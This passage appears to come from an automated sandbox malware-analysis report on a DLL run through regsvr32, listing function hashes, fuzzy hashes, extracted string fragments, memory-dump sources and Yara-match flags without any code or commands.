                                                                                        • Instruction Fuzzy Hash: 1EC1FDB150570DCBDB68CF28C58A6DE3BE5FB48308F108129FC5A9B2A0D774EA59CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: tR$tR$uxX4$6)
                                                                                        • API String ID: 0-566208085
                                                                                        • Opcode ID: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                                                        • Instruction ID: 21dbc208fb27f88b672f000d339ef1a4b78a4386f06e48fd8b1f03ba1e8317ad
                                                                                        • Opcode Fuzzy Hash: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                                                        • Instruction Fuzzy Hash: 84D1E5705087CC8BDBFEDF68C8857DA7BA8FB44748F104219EA0A9E269CB745749CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 57$7|$K-~$`by
                                                                                        • API String ID: 0-1764728439
                                                                                        • Opcode ID: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                                                        • Instruction ID: 0ef0f182f1da72c174031fc5be9a225670cb57be642fb1d84f9edf9d7426cf45
                                                                                        • Opcode Fuzzy Hash: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                                                        • Instruction Fuzzy Hash: 5EC1227510160CCBDBA8DF38C48A6DD3BE1FF58308F605129FC2A9A266C7B4D959CB44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #X$"*$DgQ$6i
                                                                                        • API String ID: 0-2770996495
                                                                                        • Opcode ID: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                                                        • Instruction ID: 504b32a01a029d54a9cc7c4b79b1c57dce6396aa3b2efbc72770fc67d95dc726
                                                                                        • Opcode Fuzzy Hash: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                                                        • Instruction Fuzzy Hash: CCB10871A0870CABDFA9DFA8E4896DDBBF1FB44344F00451DE446A7290DB749A0ECB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: O:M$iJ"]$p$p
                                                                                        • API String ID: 0-2745201584
                                                                                        • Opcode ID: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                                                        • Instruction ID: 8b688321e04c0e646b0fc78ee6d67cd940f90a9f6723fb1f8222d7259e9641f4
                                                                                        • Opcode Fuzzy Hash: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                                                        • Instruction Fuzzy Hash: 8AB10070D143098BCB89DFA8D486AEEBBF0FB48304F14851EE856B7250D7749A44CFA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                                                        • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                                                        • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                                                        • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                                                                        • API String ID: 0-1867057952
                                                                                        • Opcode ID: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                                                        • Instruction ID: 7eafebeb16ca57a5525b51ed0f378306bc52b64ad103bedb915b9118f6e813be
                                                                                        • Opcode Fuzzy Hash: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                                                        • Instruction Fuzzy Hash: 1A810C36A18B4586DB94CF59E49072EB7A0F3C4794F610526EACD87BA8DBBED441CB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 8('$6fA$9\D$OG3
                                                                                        • API String ID: 0-2292045659
                                                                                        • Opcode ID: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                                                        • Instruction ID: ef0df636cc5d4b1adb12f513697d006f7e6ff77cbfd46ce7bca5e6c4611c7a17
                                                                                        • Opcode Fuzzy Hash: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                                                        • Instruction Fuzzy Hash: 6E8166B591130DCFDB98CF28C18A5CA3BA8FF55318F00412AFC1E9A264D3B4E959CB46
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $q~$%s$R3$ows\system32\RPCRT4.dll
                                                                                        • API String ID: 0-3201263349
                                                                                        • Opcode ID: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                                                        • Instruction ID: 49708784934b6f27b099c9a4c0d62a5c340693359db0e98dd39e1096da177659
                                                                                        • Opcode Fuzzy Hash: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                                                        • Instruction Fuzzy Hash: 2D414870508784DBD398CF18C0DA65EBBF1FB853A4FA0691DF583862A4DB75D9898B03
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !j$IzY$w4$0Oa
                                                                                        • API String ID: 0-1210086663
                                                                                        • Opcode ID: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                                                        • Instruction ID: d6ae16ce1753066c3a100fad89cd7b933425bd3752a83aacc50f13ca8011d066
                                                                                        • Opcode Fuzzy Hash: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                                                        • Instruction Fuzzy Hash: 4E41CFB090034E8BCF88CF65C48A5DE7FB0FB68358F104619E916A6250D7B896A9CFC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !fl$>q$>q
                                                                                        • API String ID: 0-3196423155
                                                                                        • Opcode ID: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                                                        • Instruction ID: 6e0169028e0bb78a63dbed9d1dbc36ce20ef11fe4735bb4ca27ada0b4c61fd75
                                                                                        • Opcode Fuzzy Hash: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                                                        • Instruction Fuzzy Hash: 18022574A0670CDBCBA9CFA8E48A69DBBF1FF14388F104119F816A7261C7B49919CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "Gd$C2$HG
                                                                                        • API String ID: 0-142661339
                                                                                        • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                        • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                                                        • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                                        • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: QZB$Vu9($W1Z
                                                                                        • API String ID: 0-4157987319
                                                                                        • Opcode ID: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                                                        • Instruction ID: f699ba934c7511d53ebf66ced97cbd47477d8f387fb8544ab73dfc8f8e8f4cc9
                                                                                        • Opcode Fuzzy Hash: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                                                        • Instruction Fuzzy Hash: 7DE1E870505B888FDBB9DF24CC897EBBBE1FB84705F10551EE84A9A290DBB49648CF41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #X$1c+$,p
                                                                                        • API String ID: 0-4193689514
                                                                                        • Opcode ID: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                                                        • Instruction ID: a14642629d5f8cbd2a1e8fb09d7711f81952208659678b8c12dc59c418106fb0
                                                                                        • Opcode Fuzzy Hash: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                                                        • Instruction Fuzzy Hash: A0F166B5906749CFCB88DF68C28A58D7BF1BF59304F404129FC1A9A260D3B4E529CB49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: :a$o1$F
                                                                                        • API String ID: 0-2167756397
                                                                                        • Opcode ID: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                                                        • Instruction ID: c7b3f013bdef5c33efa64e5817367d2177fa9b070e37e7fa0e85b95e6b1d5a97
                                                                                        • Opcode Fuzzy Hash: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                                                        • Instruction Fuzzy Hash: 24A10170514609DFCB98DF28C58A6DE3BE1FF58318F40822AFC0A9B264C774DA58DB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "7F$hso$|
                                                                                        • API String ID: 0-2223032787
                                                                                        • Opcode ID: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                                                        • Instruction ID: 597be8bf6f8274430a7b1b716aee764a508e33f64a18c5174bbc12e988f7dea5
                                                                                        • Opcode Fuzzy Hash: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                                                        • Instruction Fuzzy Hash: CDA1E7716057888FEB7ADF64C8AA7DE7BA1FF59308F40461DD98E8E250C7B45608CB42
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: eG$ktw$l$6
                                                                                        • API String ID: 0-3696190584
                                                                                        • Opcode ID: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                                                        • Instruction ID: ec7ece3e5b0c03f4df558a0a1733d02cea5b85f33e09dae2f6683fda9d55fcb2
                                                                                        • Opcode Fuzzy Hash: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                                                        • Instruction Fuzzy Hash: E47114B0509708EFCB98DF68C089A9E7BB1FB88344F40C52EE849DB264C775DA19CB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %Di|$6qp$Z9s
                                                                                        • API String ID: 0-2690900941
                                                                                        • Opcode ID: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                                                        • Instruction ID: 2c0d7369d6c4e2fe59306caeaa3cf354025216a739d91ba443ab140e2def37b4
                                                                                        • Opcode Fuzzy Hash: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                                                        • Instruction Fuzzy Hash: 9C61257191070C9BCB88CF24C8C96DE7BB1FB483A8F556219FC0AAA294C7749985CF84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: les=C:\Program Files\Common Files$n?,#$ws\system;C:\Windows;
                                                                                        • API String ID: 0-2506413598
                                                                                        • Opcode ID: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                                                        • Instruction ID: 565b854ac311e8ede55e0f860d8d3b50ebc6ea35409b62ec986654d35b43713b
                                                                                        • Opcode Fuzzy Hash: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                                                        • Instruction Fuzzy Hash: 4461F97054878DCBEBBADE38C8897D937B0FB48344F908529E94E8E290DB749A458B45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Fl$Fl$vv5
                                                                                        • API String ID: 0-3053741108
                                                                                        • Opcode ID: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                                                        • Instruction ID: 55f6967587c9a541224425d329b03615816d53db549f94b6db3b05c8e91cbb03
                                                                                        • Opcode Fuzzy Hash: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                                                        • Instruction Fuzzy Hash: FC511A70E4870CAFDB69DFA8E0866DDBBF1FB58344F004519E40AE7291DB74990ACB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: H8$nn$nn
                                                                                        • API String ID: 0-4263809824
                                                                                        • Opcode ID: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                                                        • Instruction ID: 3c01ac5d5c2d3476a5cfb8eba6abf236e6c64549312703f260b6bb5002efdfbd
                                                                                        • Opcode Fuzzy Hash: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                                                        • Instruction Fuzzy Hash: 5361D67555878CCBEBBADF38CC897D97BB1FB48344F908219D80E8A260DB7457498B41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %Nz$,7%$}]{
                                                                                        • API String ID: 0-2809531587
                                                                                        • Opcode ID: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                                                        • Instruction ID: b36c8970f11ad41429e233920f6dac2517fe43d92b96f19f813f385ea8bb4fb2
                                                                                        • Opcode Fuzzy Hash: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                                                        • Instruction Fuzzy Hash: B771E470448788CBEBB5DF24C8856DEBBE4FB88744F60451DE9598B260DB749688CF01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,mQ$f41$c
                                                                                        • API String ID: 0-1594525360
                                                                                        • Opcode ID: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                                                        • Instruction ID: ca916729033610084f534c396dc33c1afc583cc00ddec4c12c7a73cc6334aceb
                                                                                        • Opcode Fuzzy Hash: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                                                        • Instruction Fuzzy Hash: AD51C071D0424C8BCB48DFA9E98A9DDBBF0FB48348F11820DE85AB7261C7749905CF69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: [/$s$|'
                                                                                        • API String ID: 0-508247755
                                                                                        • Opcode ID: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                                                        • Instruction ID: 494a7eb40676bfcc00c7fdba1f25141f52c7cc4812b1f7e8e8b884a852a0e06c
                                                                                        • Opcode Fuzzy Hash: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                                                        • Instruction Fuzzy Hash: 1841D4B090038E8FCB48DFA9D88A5DEBBB1FB48348F10461DEC25A6250D7B49554CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: _#>$`cb{$fq
                                                                                        • API String ID: 0-41881557
                                                                                        • Opcode ID: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                                                        • Instruction ID: 8d8b26aa43ab9a83d147a377112b64bfb8255cca975d25c3e902dea97d059722
                                                                                        • Opcode Fuzzy Hash: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                                                        • Instruction Fuzzy Hash: 2941C0B180078E8FCF48CF64C88A5DE7FB0FB58358F104619E86AA6250D3B89665CFC4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: =Z8$[U${To
                                                                                        • API String ID: 0-582923006
                                                                                        • Opcode ID: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                                                        • Instruction ID: dd1ba70993956fe5376c9027ab0fa5dab7ea2e8642491db667c41f00a9894f6d
                                                                                        • Opcode Fuzzy Hash: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                                                        • Instruction Fuzzy Hash: DA31AFB090074ECBCB88DF64C88A4DF7FB4FB68398F104219E855A6250D3B896A5CFD5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: L$u.
                                                                                        • API String ID: 0-1908859981
                                                                                        • Opcode ID: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                                                        • Instruction ID: fe013bb6a98280fd3664de29af0d6deafe853b8c6d857857911529a75c261ac8
                                                                                        • Opcode Fuzzy Hash: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                                                        • Instruction Fuzzy Hash: FDE1167152478DABDF98CF28C8C6ADD3BA1FB48394F906229FD0287260D775D985CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: v^$|8W
                                                                                        • API String ID: 0-4274756280
                                                                                        • Opcode ID: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                                                        • Instruction ID: eb46043f5dfd862e599a3e1f0545fc92660674d3eece30cf186a2abccef00301
                                                                                        • Opcode Fuzzy Hash: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                                                        • Instruction Fuzzy Hash: 23D11171A0630CCBDB68DF68C58AA9D7BE1FF59348F104129FC1A9B261C770E919CB85
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `:$u5\
                                                                                        • API String ID: 0-1141760586
                                                                                        • Opcode ID: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                                                        • Instruction ID: 309421123f437f89acc2771e6a55141bc20ba277e2d56715f434ec53ca724750
                                                                                        • Opcode Fuzzy Hash: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                                                        • Instruction Fuzzy Hash: 69C1207150574DCBDB99CF28C58A6D93BE5FF98348F104129FC0E862A1CBB4EA18CB46
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
